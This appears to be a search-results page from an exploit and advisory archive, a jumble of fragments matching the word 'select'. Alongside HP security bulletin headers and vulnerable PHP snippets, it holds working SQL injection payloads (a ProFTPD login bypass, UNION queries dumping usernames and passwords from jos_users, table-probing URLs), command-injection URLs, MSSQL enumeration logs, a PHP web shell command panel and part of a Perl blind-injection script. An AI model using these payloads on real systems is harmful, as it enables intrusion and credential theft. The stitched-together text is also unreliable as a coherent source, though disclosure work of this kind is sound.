| New User, Welcome! Login |
Next Page >>
select
--- SQL Log ---
select @@version = 5.0.83-enterprise-nt
select user() = vpuser@localhost
select @@datadir = C://GMSVP//MySQL//data//
SELECT count(schema_name) FROM information_schema.schemata = 43
SELECT schema_name FROM information_schema.schemata limit 0,1 = information_schema
SELECT schema_name FROM information_schema.schemata limit 1,1 = mysql
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01531379
Version: 1
HPSBMA02361 SSRT080119 rev.1 - HP OpenView Select Identity Connectors running on Windows, Local Information Disclosure
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-09-04
Last Updated: 2008-09-04
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01531379
Version: 1
HPSBMA02361 SSRT080119 rev.1 - HP OpenView Select Identity Connectors running on Windows, Local Information Disclosure
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-09-04
Last Updated: 2008-09-04
else if ( empty($_POST['message']) ) {
redirect_header("javascript:history.go(-1)", 2, _MD_ERRORMESSAGE);
exit();
}
else {
$sql = "SELECT * FROM ".$bbTable['forums']." WHERE forum_id = ".$_POST['forum'].""; // <-------- !!!
if (!$result = $db->query($sql)) {
redirect_header("index.php", 2, _MD_CANTGETFORUM);
exit();
}
...
Source distribution
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
26454 futex(0x8a6ff90, FUTEX_WAIT, 1, NULL <unfinished ...>
26453 select(14, [11 13], NULL, NULL, NULL <unfinished ...>
26455 futex(0x8a70000, FUTEX_WAIT, 5, NULL <unfinished ...>
26456 futex(0x8a70070, FUTEX_WAIT, 3, NULL <unfinished ...>
26457 futex(0x8a700e0, FUTEX_WAIT, 1, NULL <unfinished ...>
26459 select(0, NULL, NULL, NULL, {0, 55000} <unfinished ...>
26460 select(0, NULL, NULL, NULL, {0, 953000} <unfinished ...>
Looks like a very serious issue to me - it works on our ProFTPD
1.3.2rc2 Server (latest stable on gentoo).
220 ProFTPD 1.3.2rc2 Server (Pumpkin) [xx.xx.xx.xx]
USER %') and 1=2 union select
1,0x24312452565a583533784324716a304d4d6b4670426b4b486177644264756634392f,uid,gid,homedir,shell
from ftp #
331 Password required for %')
PASS 1
230 User %') and 1=2 union select
ProLiant DL/ML 100 G5-Series
The Lights-Out 100 Remote Management Firmware Upgrade v3.11 or later is available for download. Obtain the Firmware Upgrade for the HP ProLiant DL/ML100 series Lights-Out 100 Remote Management Firmware v3.11 or later as follows:
Click on the following URL and then follow the instructions below: http://welcome.hp.com/country/us/en/support.html?pageDisplay=drivers
1. Under Select a product category, select Servers.
2. Select ProLiant/tc Series Servers.
3. Select the appropriate ProLiant DL/ML100 series G5 server.
4. Select the appropriate operating system.
5. Select Firmware - Management.
6. Select the Firmware upgrade for the appropriate HP ProLiant DL/ML100 G5-Series servers; Lights-Out 100 Remote Management Firmware v3.11 or later.
Vendor notified on 12-13-07 and the product development manager was uncooperative and hung up on us.
Sample Query Logs from Exploiter Beta:
======================================
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin')
Column found: table=Admin, column=ID
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'ID'
Column found: table=Admin, column=LastLogin
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'LastLogin'
Column found: table=Admin, column=OrgId
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>command [ system , shell_exec , passthru , Wscript.Shell , exec , popen ]</b></td></tr></table>','center','top');
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));
echo"<tr class='secondalt'><td align='center'><textarea name='textarea' cols='100' rows='25' readonly>";
if ($_POST['command'] ) {
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01391833
Version: 1
HPSBMA02317 SSRT080026 rev.1 - HP Select Identity Software, Gain Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-03-11
Last Updated: 2008-04-01
> Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:
Could you please provide the version number which is affected by this?
Running ProFTPD Version: 1.3.0 (stable) on Linux (Debian etch) I cannot
reproduce your report.
> USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
>
> and a password of "1" (without quotes).
>
> which leads to a successful login. Different account logins can be made successful using the limit clase (e.g appending "LIMIT 5,1" will make you login with as the 5th account in the users table).
>
Advisory: IceWarp WebMail Server: SQL Injection in Groupware Component
During a penetration test RedTeam Pentesting discovered multiple
SQL-Injections in the IceWarp WebMail Server. Attackers that are in
control of a user account for the web-based email and groupware
components are able to execute arbitrary SQL SELECT statements and
therefore read any data from the DBMS that are accessible by the Icewarp
eMail Server.
Details
Windows Environment:
1. Locate the files "webengine.exe" and "freeaccess.spl". The files
are located in the "$NX_ROOT\bin" and "$NX_ROOT\bopcfg\www" directory
respectively.
2. Right click on each of the files and select Properties.
3. Select the General tab.
4. If either file timestamp is earlier than indicated in the below
table, the installation is vulnerable.
File Name
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01658614
Version: 1
HPSBMA02403 SSRT090007 rev.1 - HP Select Access Running on HP-UX, Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-01-28
Last Updated: 2009-01-28
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2.6- If you see “Error: 70500170 : User already exists in either OS or Database.“ Means that all the thing are OK!, and your permission has already set.
2.7- Now you have a full access to "[HCPATH]\Forum\DB".
Note: You can do that with "[HCPATH]\phpBB\phpBB\db" too because there is "db" directory too.
2.8- So you can upload your command executer there, but you need a file uploader at first on "testuser.com" to upload your command executer on "[HCPATH]\Forum\DB".
2.9- If your permission has not been set correctly, its always because of limitation on making a new user. So you must login with username's reseller and make a new plan with making some new user accounts permission then sell it to your username. Also, you can increase your credit amount (part 6) and buy a plan with a lot of web accounts then select it and do these operation from the first. (Note: This vulnerability works properly and there is no exception like the others!)
\\\\\\\\\\\\\\\\\\\\\
/////////////////////
3- [Remote Attacker] can make a new user.
[+] Exploding:
[*] Checking table:
[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/template_permalink.asp?id=78 and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM tblauthor) >= 0
[~] Example2: http://localhost/[path]/template_permalink.asp?id=78 and exists (select * from tblauthor)
[~] If you don't see any error, it is that table exist.
#######################################################################
Vulnerability 1: Internet Explorer Select Element Remote Code Execution
#######################################################################
Original advisory:
http://ifsec.blogspot.com/2011/10/internet-explorer-select-element-remote.html
I. OVERVIEW
There is a vulnerability in Internet Explorer which enables execution
[+] Exploding:
[*] Checking table:
[~] Exploit: http://localhost/[path]/full_text.php?nid=[NUM] AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/full_text.php?nid=[NUM] and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/full_text.php?nid=4855 AND (SELECT Count(*) FROM binn_users) >= 0
[~] Example2: http://localhost/[path]/full_text.php?nid=4855 and exists (select * from binn_users)
[~] If you don't see any error, it is that table exist.
A) Multiple Remote Command Execution
http://site/path/admin/uploadItem.php?image=.; ;
http://site/path/admin/removeItemResponse.php?ItemID=.; ping localhost ;
http://site/path/admin/removeCategoryResponse.php?CategoryID=-1' UNION SELECT '; ping localhost ;'%23
B) Multiple SQL Injection
http://site/path/description.php?II=-1' UNION SELECT 1,2,3,4,5,6,7%23&UID=VALID UID HERE
Note that the query in SESS_getUserIdFromSession() function:
...
if ($md5_based == 1) {
$sql = "SELECT uid FROM {$_TABLES['sessions']} WHERE "
. "(md5_sess_id = '$sessid') AND (start_time > $mintime) AND (remote_ip = '$remote_ip')";
} else {
$sql = "SELECT uid FROM {$_TABLES['sessions']} WHERE "
. "(sess_id = '$sessid') AND (start_time > $mintime) AND (remote_ip = '$remote_ip')";
[+] Exploding:
[*] Checking table:
[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/[any module]?id=1 and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0
[~] Example2: http://localhost/[path]/[any module]?id=1 and exists (select * from users)
[~] If you don't see any error, it is tha table exist.
IV. SAMPLE CODE
_______________
A) Multiple SQL Injection
http://site/path/index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
http://site/path/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users
http://site/path/index.php?option=com_amblog&task=newform&catid=-1 UNION SELECT 1,CONCAT(username,0x3a,password) FROM jos_users
Use the following procedure to download the software required.
Go to the HP Web site at the following URL: www.hp.com
Select: "Support and Drivers"
Follow: Step 1 - click the button: "Download drivers and software (and firmware)"
Step 2 - select product category: "Storage"
Select: "Storage Software"
Select: "Storage Replication Software"
Select: "HP StorageWorks Storage Mirroring Software"
// if not, get from mysql and save to cache
if (isset($cached_links[$id]) && $usecache == TRUE) {
$link = $cached_links[$id];
} else {
$link = $db->get_row("SELECT " . table_links . ".* FROM " .
table_links . " WHERE link_id = $id");
$cached_links[$id] = $link;
}
-----------------------------[source code start]-------------------------------
if ($msg) {
$msg = trim($msg);
$res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver)."");
$user = mysql_fetch_assoc($res);
if (!$user)
$message = "Username not found.";
...
...
function SEC_authenticate($username, $password, &$uid)
{
global $_CONF, $_TABLES, $LANG01;
$result = DB_query("SELECT status, passwd, email, uid FROM {$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or (remoteservice = ''))"); //<------------------- SQL INJECTION HERE
$tmp = DB_error();
$nrows = DB_numRows($result);
if (($tmp == 0) && ($nrows == 1)) {
$U = DB_fetchArray($result);
385| {
386| $db =& $this->DB(); if (!$db) return false;
387| $this->_where = $where;
388|
389| $save = $db->SetFetchMode(ADODB_FETCH_NUM);
390| $row = $db->GetRow("select * from ".$this->_table.' WHERE '.$where,$bindarr);
391| $db->SetFetchMode($save);
392|
393| return $this->Set($row);
394| }
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01346579
Version: 1
HPSBMA02309 SSRT080013 rev.1 - HP Select Identity Software, Remote Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-02-06
Last Updated: 2008-02-06
}
#Check to make sure the target is vulnerable
if($b!=1||$p!=1){
$vulnerable=1;
#Yes I am assuming the default table prefix, its a shame you can't access information_schema.
#No prefix is needed for the non-cookie attack becase I do not need a union select or sub-select!
bin_finder(2,1,"1","smf_members","and 1!=1");
if(int(@result[0])!=0){
$vulnerable=0;
}
$globPos=1;
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01502023
Version: 2
HPSBMA02346 SSRT080097 rev.3 - HP OpenView Select Identity Active Directory Bidirectional LDAP Connector, Remote Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-07-14
Last Updated: 2008-07-21
Next Page>>
|
|
|
